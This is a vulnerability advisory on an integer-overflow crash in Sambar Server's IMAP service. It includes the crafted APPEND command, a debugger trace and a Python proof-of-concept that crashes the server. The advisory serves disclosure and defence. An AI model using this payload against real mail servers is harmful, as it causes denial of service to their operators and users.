Sambar Technologies All-In-One Server IMAPd Integer Overflow Delivery: Undisclosed Severity: Medium/High Time line: 2006-01-26 Discovery Software affected: Sambar v6.4 and earlier - all platforms. Tested on: * Sambar v6.4 (Windows - Version 5.1.2600) Vendor: http://s3.amazonaws.com/sambar64/sambar643p.exe Author: Christoph Diehl I. BACKGROUND Sambar Technologies is a leading provider of website, email, instant messaging, and document management tools for organizations and individuals. The Sambar Server is used by thousands of businesses, schools, service providers and individuals around the world to enhance communication and collaboration. From web, email and IM, to document management and application sharing, the Sambar Server supports it all from one proven, reliable platform. II. DESCRIPTION The IMAP service is vulnerable by sending a special crafted APPEND command with an oversized message literal, thus results in a complete application shutdown after the exception in the IMAP service occurred. III. DETAILS APPEND INBOX (\Seen) {4294967295} Syntax: APPEND mailbox name OPTIONAL flag parenthesized list OPTIONAL date/time string message literal Call stack of thread 00000A1C, item 0 Address=01ACC0A0 Stack=100FBB78 Procedure / arguments=sambar._cm_net_read Called from=sambar.100FBB73 *********************************************************** [sambarcm] 0044568D 8B45 50 mov eax, dword ptr ss:[ebp+50] 00445690 8B75 44 mov esi, dword ptr ss:[ebp+44] 00445693 8B4C24 24 mov ecx, dword ptr ss:[esp+24] 00445697 8D5D 50 lea ebx, dword ptr ss:[ebp+50] 0044569A 2BC6 sub eax, esi 0044569C 3BC1 cmp eax, ecx 0044569E 7D 06 jge short sambarcm.004456A6 004456A0 894424 18 mov dword ptr ss:[esp+18], eax 004456A4 EB 06 jmp short sambarcm.004456AC 004456A6 894C24 18 mov dword ptr ss:[esp+18], ecx 004456AA 8BC1 mov eax, ecx 004456AC 85C0 test eax, eax 004456AE 76 4D jbe short sambarcm.004456FD 004456B0 8B55 44 mov edx, dword ptr ss:[ebp+44] 004456B3 8BC8 mov ecx, eax 004456B5 8DB42A DC000000 lea esi, dword ptr ds:[edx+ebp+DC] 004456BC 8BD1 mov edx, ecx 004456BE C1E9 02 shr ecx, 2 004456C1 F3:A5 rep movs dword ptr es:[edi], dword ptr ds:[esi] ; <-- *********************************************************** EAX FFFFFFFF ECX 3FFFF28D EDX FFFFFFFF EBX 0127FB40 ESP 01ACC090 EBP 0127FAF0 ESI 01283194 EDI 01AD0000 EIP 004456C1 sambarcm.004456C1 *********************************************************** Access violation when writing to [01AD0000] IV. PROOF OF CONCEPT # -*- coding: ISO-8859-1 -*- import socket, time print "Sending payload:", s = socket.socket() s.connect(("127.0.0.1", 143)) s.send("a001 login test test\r\n") print s.recv(256) s.send("a002 APPEND INBOX (\Seen) {4294967295}\r\n") s.recv(256) s.close() print "Done." time.sleep(5) print "Checking only IMAP service:", try: s = socket.socket() s.connect(("127.0.0.1", 143)) except socket.error: print "All services are down." else: print "Running"